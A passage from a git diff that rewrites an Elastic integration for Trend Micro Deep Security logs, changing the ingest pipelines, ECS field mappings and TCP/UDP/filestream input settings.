deviceCustomString5 - to: trendmicro.event.ips_stream_position - - name: baseEventCount - to: trendmicro.event.count - - name: deviceCustomNumber3 - to: trendmicro.event.ips_packet_position - - name: TrendMicroDsPacketData - to: trendmicro.event.packet_data - - name: deviceCustomString2 - to: trendmicro.event.tcp_flag - - name: deviceCustomString6 - to: trendmicro.event.ips_flag - - name: deviceCustomString3 - to: trendmicro.event.packet_fragmentation - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml index a3ebe1385a2..c619e7a082f 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/log-inspection.yml @@ -2,75 +2,13 @@ description: Pipeline for Log Inspection events processors: - set: - field: trendmicro.event.category - value: "log-inspection" - - set: - field: event.category - value: ["package"] - - set: - field: event.type - value: ["info"] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceCustomString1 - to: trendmicro.event.log_inspection_description - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - remove: - field: - - _tmp_copy + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: log-inspection-event on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml index 474daff90ed..0297d9ac601 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/malware-event.yml @@ -2,119 +2,29 @@ description: Pipeline for processing Anti-Malware event logs processors: - set: - field: trendmicro.event.category - value: "anti-malware" - - set: - field: event.category - value: ["malware"] - - set: - field: event.type - value: ["info"] + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: anti-malware-event - script: lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber2 - to: file.size - - name: deviceCustomNumber1 - to: host.id - - name: deviceHostName - to: host.hostname - - name: deviceAddress - to: host.ip - - name: TrendMicroDsFileMD5 - to: file.hash.md5 - - name: TrendMicroDsFileSHA1 - to: file.hash.sha1 - - name: TrendMicroDsFileSHA256 - to: file.hash.sha256 - - name: TrendMicroDsRelevantDetectionNames - to: trendmicro.event.probable_threat_type - - name: TrendMicroDsMalwareTarget - to: trendmicro.event.malware_target - - name: TrendMicroDsMalwareTargetType - to: trendmicro.event.malware_target_type - - name: deviceCustomString6 - to: container.image.name - - name: TrendMicroDsDetectionConfidence - to: trendmicro.event.threat_probability - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - name: deviceCustomString5 - to: trendmicro.event.spyware_risklevel - convert: - "0": Very Low - "25": Low - "50": Medium - "75": High - "100": Very High - - name: deviceCustomString4 - to: trendmicro.event.spyware_resourcetype - convert: - "10": Files and Directories - "11": System Registry - "12": Internet Cookies - "13": Internet URL Shortcut - "14": Programs in Memory - "15": Program Startup Areas - "16": Browser Helper Object - "17": Layered Service Provider - "18": Hosts File - "19": Windows Policy Settings - "20": Browser - "23": Windows Shell Setting - "24": IE Downloaded Program Files - "25": Add/Remove Programs - "26": Services - "other": Other - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); + tag: script_to_set_ecs_categorization_in_malware_pipeline + description: Script to set ECS categorizations. + if: ctx.trendmicro?.deep_security?.signature_id != null + source: >- + def signatureIds = [4000000L, 4000001L, 4000002L, 4000003L, 4000010L, 4000011L, 4000012L, 4000013L, 4000020L, 4000030L]; + if (signatureIds.contains(ctx.trendmicro.deep_security.signature_id)) { + ctx.event.category = ["malware"]; + ctx.event.kind = "alert"; + ctx.event.type = ["info"]; } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml index a0a76632fd9..6c95b3f137b 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/system-event.yml @@ -2,75 +2,30 @@ description: Pipeline for processing System event logs processors: - set: - field: trendmicro.event.category - value: "system" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: system-event + - append: field: event.category - value: [malware,threat] - - set: + tag: append_event_category + value: authentication + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 + - append: field: event.type - value: [info] - - - script: - lang: painless - params: - extensions: - # Rename field - - name: target - to: trendmicro.event.target - - name: targetID - to: trendmicro.event.target_id - - name: targetType - to: trendmicro.event.target_type - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - - remove: - field: - - _tmp_copy - + tag: set_event_type + value: info + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 + - set: + field: event.outcome + tag: set_event_outcome + value: failure + if: ctx.trendmicro?.deep_security?.signature_id == 397 || ctx.trendmicro?.deep_security?.signature_id == 160 on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml index d272be61229..2ddeb25ed60 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/web-reputation.yml @@ -2,79 +2,29 @@ description: Pipeline for Web Reuptation processors: - set: - field: trendmicro.event.category - value: "web-reputation" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: web-reputation-event + - append: field: event.category - value: [network] + tag: set_event_category + value: network + allow_duplicates: false - append: field: event.type + tag: set_event_type value: info allow_duplicates: false - if: ctx.trendmicro?.event?.signature_id != null && ctx.trendmicro.event.signature_id == '5000000' - append: field: event.type + tag: set_event_type value: denied allow_duplicates: false - if: ctx.trendmicro?.event?.signature_id != null && ctx.trendmicro.event.signature_id == '5000001' - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - remove: - field: - - _tmp_copy + if: ctx.trendmicro?.deep_security?.signature_id != null && ctx.trendmicro.deep_security.signature_id == 5000001 on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml b/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml index 7c798f4534c..ef5a78420f8 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml +++ b/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml @@ -7,6 +7,17 @@ - name: data_stream.namespace type: constant_keyword description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: trendmicro +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: trendmicro.deep_security +- name: log.source.address + description: Source address from which the log event was read / sent from. + type: keyword - name: '@timestamp' type: date description: Event timestamp. diff --git a/packages/trendmicro/data_stream/deep_security/fields/beats.yml b/packages/trendmicro/data_stream/deep_security/fields/beats.yml new file mode 100644 index 00000000000..9eff736e678 --- /dev/null +++ b/packages/trendmicro/data_stream/deep_security/fields/beats.yml @@ -0,0 +1,30 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: log.file + type: group + fields: + - name: device_id + type: keyword + description: ID of the device containing the filesystem where the file resides. + - name: fingerprint + type: keyword + description: The sha256 fingerprint identity of the file when fingerprinting is enabled. + - name: inode + type: keyword + description: Inode number of the log file. + - name: idxhi + type: keyword + description: The high-order part of a unique identifier that is associated with a file. (Windows-only) + - name: idxlo + type: keyword + description: The low-order part of a unique identifier that is associated with a file. (Windows-only) + - name: vol + type: keyword + description: The serial number of the volume that contains a file. (Windows-only) +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/trendmicro/data_stream/deep_security/fields/fields.yml b/packages/trendmicro/data_stream/deep_security/fields/fields.yml index 7be00f90dde..692a48e3b70 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/fields.yml +++ b/packages/trendmicro/data_stream/deep_security/fields/fields.yml @@ -1,90 +1,315 @@ -- name: trendmicro.event +- name: source.process.name + type: keyword + description: Source process name. +- name: trendmicro type: group fields: - - name: action_reason - type: keyword - description: The reason why application control performed the specified action, such as "notWhitelisted" (the software did not have a matching rule, and application control was configured to block unrecognized software). - - name: tags - type: keyword - description: Deep Security event tags assigned to the event. - - name: tenant_id - type: keyword - description: Deep Security tenant ID. - - name: tenant_name - type: keyword - description: Deep Security tenant name. - - name: aggregation_type - type: keyword - description: An integer that indicates how the event is aggregated. - - name: count - type: keyword - description: The number of occurrences of the event. - - name: tcp_flag - type: keyword - description: TCP Flag. - - name: packet_fragmentation - type: keyword - description: Packet Fragmentation Information. - - name: ethernet_frame_type - type: keyword - description: Connection ethernet frame type. - - name: packet_data - type: keyword - description: The packet data, represented in Base64. - - name: old_file_path - type: keyword - description: The previous integrity rule target entity to capture the rename action from the previous target entity to the new, which is recorded in the filePath field. - - name: ips_stream_position - type: keyword - description: Position within stream of data that triggered the event. - - name: ips_packet_position - type: keyword - description: Position within packet of data that triggered the event. - - name: ips_flag - type: keyword - description: A combined value that includes the sum of the flag values. - - name: log_inspection_description - type: keyword - description: The Log Inspection sub-rule which triggered this event. - - name: threat_type - type: keyword - description: The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. - - name: malware_target - type: keyword - description: The file, process, or registry key (if any) that the malware was trying to affect. If the malware was trying to affect more than one, this field will contain the value "Multiple." - - name: malware_target_type - type: keyword - description: The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. - - name: threat_probability - type: keyword - description: Indicates how closely (in %) the file matched the malware model. - - name: spyware_risklevel - type: keyword - description: Risk level values. - - name: spyware_resourcetype - type: keyword - description: Resource Type values.For example, if there's a spyware file named spy.exe that creates a registry run key to keep its persistence after system reboot, there will be two items in the spyware report; the item for spy.exe has Files and Directories, and the item for the run key registry has System Registry. - - name: target - type: keyword - description: The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. - - name: target_id - type: keyword - description: The identifier added in the manager. - - name: target_type - type: keyword - description: The event target entity type. - - name: message - type: keyword - description: The event short message. - - name: name - type: keyword - description: Name of the event type. - - name: probable_threat_type - type: keyword - description: Probable Threat Type.Indicates the most likely type of threat contained in the file after Predictive Machine Learning compared the analysis to other known threats(separate by semicolon";" ). - - name: category - type: keyword - description: proper categorization of some events. - - name: signature_id - type: integer - description: The "Signature ID" value indicates what kind of event has been triggered. + - name: deep_security + type: group + fields: + - name: action + type: keyword + description: The action detected by the integrity rule. + - name: aggregation_type + type: keyword + description: An integer that indicates how the event is aggregated:. + - name: base_event_count + type: long + description: Base event count. + - name: bytes_in + type: long + description: Number of inbound bytes read. + - name: computer_name + type: keyword + description: The computer name. + - name: destination + type: group + fields: + - name: address + type: ip + description: IP address of the destination computer. + - name: mac_address + type: keyword + description: Destination MAC Address. + - name: port + type: long + description: Port number of the destination computer's connection or session. + - name: user_name + type: keyword + description: Destination user name. + - name: device + type: group + fields: + - name: custom_number1 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn1. + - name: value + type: keyword + description: The value for the field cn1. + - name: custom_number2 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn2. + - name: value + type: long + description: The value for the field cn2. + - name: custom_number3 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn3. + - name: value + type: long + description: The value for the field cn3. + - name: custom_string1 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs1. + - name: value + type: keyword + description: The value for the field cs1. + - name: custom_string2 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs2. + - name: value + type: keyword + description: The value for the field cs2. + - name: custom_string3 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs3. + - name: value + type: keyword + description: The value for the field cs3. + - name: custom_string4 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs4. + - name: value + type: keyword + description: The value for the field cs4. + - name: custom_string5 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs5. + - name: value + type: keyword + description: The value for the field cs5. + - name: custom_string6 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs6. + - name: value + type: keyword + description: The value for the field cs6. + - name: custom_string7 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs7. + - name: value + type: keyword + description: The value for the field cs7. + - name: product + type: keyword + description: Product name. + - name: vendor + type: keyword + description: Vendor name. + - name: version + type: keyword + description: Product version. + - name: deviceHostName + type: keyword + description: The hostname for cn1. + - name: domain_name + type: keyword + description: The domain name. + - name: event_category + type: keyword + description: Event category of deep security event. + - name: event_class_id + type: keyword + description: Event Class ID. + - name: file + type: group + fields: + - name: hash + type: keyword + description: The SHA 256 hash that identifies the software file. + - name: size + type: long + description: The file size in bytes. + - name: file_path + type: keyword + description: The location of the malware file. + - name: filename + type: keyword + description: The file name that was accessed. + - name: message + type: keyword + description: A list of changed attribute names. + - name: model + type: keyword + description: The product name of the device. + - name: name + type: keyword + description: CEF event containing message. + - name: permission + type: keyword + description: The block reason of the access. + - name: process + type: group + fields: + - name: name + type: keyword + description: The process name. + - name: repeat_count + type: keyword + description: The number of occurrences of the event. + - name: request_url + type: keyword + description: The URL of the request. + - name: result + type: keyword + description: The result of the failed Anti-Malware action. + - name: serial + type: keyword + description: The serial number of the device. + - name: severity + type: long + description: Severity of the Event. + - name: signature_id + type: long + description: Signature ID of event. + - name: source + type: group + fields: + - name: address + type: ip + description: Source computer IP address. + - name: host_name + type: keyword + description: Source computer hostname. + - name: mac_address + type: keyword + description: MAC address of the source computer's network interface. + - name: port + type: long + description: Port number of the source computer's connection or session. + - name: process_name + type: keyword + description: The name of the event's source process. + - name: user_id + type: keyword + description: Source user ID. + - name: user_name + type: keyword + description: Account of the user who changed the file being monitored. + - name: target + type: group + fields: + - name: id + type: keyword + description: The identifier added in the manager. + - name: value + type: keyword + description: The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. + - name: transport_protocol + type: keyword + description: Name of the transport protocol used. + - name: trendmicro + type: group + fields: + - name: ds_behavior + type: group + fields: + - name: rule_id + type: keyword + description: The behavior monitoring rule ID for internal malware case tracking. + - name: type + type: keyword + description: The type of behavior monitoring event detected. + - name: ds_command_line + type: keyword + description: The commands that the subject process executes. + - name: ds_cve + type: keyword + description: The CVE information, if the process behavior is identified in one of Common Vulnerabilities and Exposures. + - name: ds_detection_confidence + type: long + description: Indicates how closely the file matched the malware model. + - name: ds_file + type: group + fields: + - name: md5 + type: keyword + description: The MD5 hash of the file. + - name: sha1 + type: keyword + description: The SHA1 hash of the file. + - name: sha256 + type: keyword + description: The SHA256 hash of the file. + - name: ds_frame_type + type: keyword + description: Connection ethernet frame type. + - name: ds_malware_target + type: group + fields: + - name: count + type: long + description: The number of target files. + - name: type + type: keyword + description: The type of system resource that this malware was trying to affect. + - name: value + type: keyword + description: The file, process, or registry key (if any) that the malware was trying to affect. + - name: ds_mitre + type: keyword + description: The MITRE information, if the process behavior is identified in one of MITRE attack scenarios. + - name: ds_packet_data + type: keyword + description: The packet data, represented in Base64. + - name: ds_process + type: keyword + description: Name of ds process. + - name: ds_relevant_detection_names + type: keyword + description: Probable Threat Type. + - name: ds_tenant + type: keyword + description: Deep Security tenant. + - name: ds_tenant_id + type: keyword + description: Deep Security tenant ID. + - name: type + type: keyword + description: The device type of the device. + - name: version + type: keyword + description: Deep Security version. + - name: xff + type: ip + description: The IP address of the last hub in the X-Forwarded-For header. diff --git a/packages/trendmicro/data_stream/deep_security/manifest.yml b/packages/trendmicro/data_stream/deep_security/manifest.yml index f5574e12641..b30baf06637 100644 --- a/packages/trendmicro/data_stream/deep_security/manifest.yml +++ b/packages/trendmicro/data_stream/deep_security/manifest.yml @@ -1,41 +1,100 @@ -title: "Trendmicro Deep Security logs" +title: Collect logs from Trend Micro Deep Security type: logs streams: - - input: filestream - template_path: stream.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs + - input: tcp + enabled: false + template_path: tcp.yml.hbs + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via TCP input. vars: - - name: paths + - name: listen_address type: text - title: Paths - multi: true + title: Listen Address + description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false required: true show_user: true - default: - - /var/log/trendmicro.log - - name: decode_trendmicro_timezone + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The TCP port number to listen on. + multi: false + required: true + show_user: true + default: 9510 + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset + multi: false + required: false + show_user: true + description: |- + When interpreting syslog timestamps without a time zone, use this timezone offset. + Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. + Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. + - name: tcp_options + type: yaml + title: Custom TCP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #max_connections: 1 + description: Specify custom configuration options for the TCP input. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. multi: false required: false show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false @@ -45,48 +104,75 @@ streams: multi: false required: false show_user: false - description: Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - input: udp + enabled: false template_path: udp.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs using udp input + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via UDP input. vars: - - name: udp_host + - name: listen_address type: text - title: UDP host to listen on + title: Listen Address + description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces. multi: false required: true show_user: true default: localhost - - name: udp_port + - name: listen_port type: integer - title: UDP port to listen on + title: Listen Port + description: The UDP port number to listen on. multi: false required: true show_user: true - default: 9003 - - name: decode_trendmicro_timezone + default: 9510 + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset + multi: false + required: false + show_user: true + description: |- + When interpreting syslog timestamps without a time zone, use this timezone offset. + Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. + Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. + - name: udp_options + type: yaml + title: Custom UDP Options multi: false required: false show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + default: | + #max_message_size: 50KiB + #timeout: 300s + description: Specify custom configuration options for the UDP input. - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false @@ -96,50 +182,55 @@ streams: multi: false required: false show_user: false - description: >- - Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - - input: tcp - template_path: tcp.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs using udp input + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: filestream + enabled: false + template_path: filestream.yml.hbs + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via Filestream input. vars: - - name: tcp_host + - name: paths type: text - title: TCP host to listen on - multi: false - required: true - show_user: true - default: localhost - - name: tcp_port - type: integer - title: Syslog Port - description: TCP port to listen on - multi: false + title: Paths + multi: true required: true show_user: true - default: 9003 - - name: decode_trendmicro_timezone + description: A list of glob-based paths that will be crawled and fetched. + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset multi: false required: false - show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + show_user: true + description: |- + When 